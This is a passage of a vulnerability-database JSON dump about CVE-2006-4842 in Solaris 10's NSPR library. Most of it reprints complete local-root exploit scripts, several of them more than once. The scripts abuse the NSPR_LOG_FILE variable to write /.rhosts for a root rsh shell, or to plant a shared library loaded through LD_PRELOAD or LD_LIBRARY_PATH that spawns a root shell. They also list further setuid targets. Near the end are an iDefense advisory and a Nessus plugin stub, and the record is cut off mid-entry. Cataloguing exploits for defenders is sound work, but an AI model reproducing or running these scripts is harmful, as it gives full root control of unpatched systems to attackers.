Netscape Portable Runtime API Local Privilege Escalation Vulnerabili", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2008-08-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3899", "id": "SSV:3899", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error v\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-3899"}, {"lastseen": "2017-11-19T15:24:02", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64124", "id": "SSV:64124", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "int getuid(){return 0;}" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\r\n# milw0rm.com [2006-10-16]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64124"}, {"lastseen": "2017-11-19T16:09:38", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 libnspr - constructor Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64170", "id": "SSV:64170", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n# milw0rm.com [2006-10-24]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64170"}, {"lastseen": "2017-11-19T22:24:17", "description": "No description provided by source.", "published": "2006-10-27T00:00:00", "title": "Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5298", "id": "SSV:5298", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "int getuid(){return 0;}" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-5298"}, {"lastseen": "2017-11-19T15:02:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 (libnspr) - Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64104", "id": "SSV:64104", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho "+ +" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n# milw0rm.com [2006-10-13]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64104"}, {"lastseen": "2017-11-19T22:25:19", "description": "No description provided by source.", "published": "2006-10-25T00:00:00", "title": "Solaris 10 libnspr constructor Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5260", "id": "SSV:5260", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-5260"}, {"lastseen": "2017-11-19T22:27:38", "description": "No description provided by source.", "published": "2006-10-13T00:00:00", "title": "Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-16657", "id": "SSV:16657", "sourceData": "\n #!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho "+ +" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i\n\n# milw0rm.com [2006-10-13]\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-16657"}, {"lastseen": "2017-11-19T15:57:43", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (1)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82335", "id": "SSV:82335", "sourceData": "\n source: http://www.securityfocus.com/bid/20471/info\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho "+ +" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82335"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-4842"], "description": "Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability\r\n\r\niDefense Security Advisory 10.11.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/\r\nOct 11, 2006\r\n\r\nI. BACKGROUND\r\n\r\nThe Netscape Portable Runtime (NSPR) API allows compliant applications\r\nto use system facilities such as threads, thread synchronization, I/O,\r\ninterval timing, atomic operations and several other low-level services\r\nin a platform-independent manner. More information can be found on\r\nMozilla's website at http://www.mozilla.org/projects/nspr/.\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of a design error vulnerability in version 4.6.1 of\r\nNSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\ncreate or overwrite arbitrary files on the system.\r\n\r\nThe problem exists because environment variables are used to create log\r\nfiles. Even when the program is setuid, users can specify a log file\r\nthat will be created with elevated privileges.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows local attackers to elevate privileges to root.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed that Solaris 10 with NSPR version 4.6.1 is vulnerable\r\nto privilege escalation. Additionally, iDefense has also confirmed via\r\nthe source code that version 4.6.2 does not address the vulnerability.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any effective workaround for this\r\nissue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nSun Microsystems has addressed this issue with Sun Security Alert 102658\r\nwhich can be found at:\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2006-4842 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n08/31/2006 Initial vendor notification\r\n09/04/2006 Initial vendor response\r\n10/11/2006 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "SECURITYVULNS:DOC:14651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14651", "title": "[Full-disclosure] iDefense Security Advisory 10.11.06: Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:49", "description": "NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\n\nThis plugin has been deprecated and either replaced with individual 119213 patch-revision plugins, or deemed non-security related.", "edition": 9, "published": "2005-10-19T00:00:00", "title": "Solaris 10 (sparc) : 119213-36 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_119213.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20052", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20052);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/30 13:40:15\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-36 (deprecated)\");\n script_summary(english:\"Check for patch 119213-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\n\nThis plugin has been deprecated and either replaced with individual\n119213 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 119213 instead.\");\n", "cvss": {"score": 5.8, "vector": 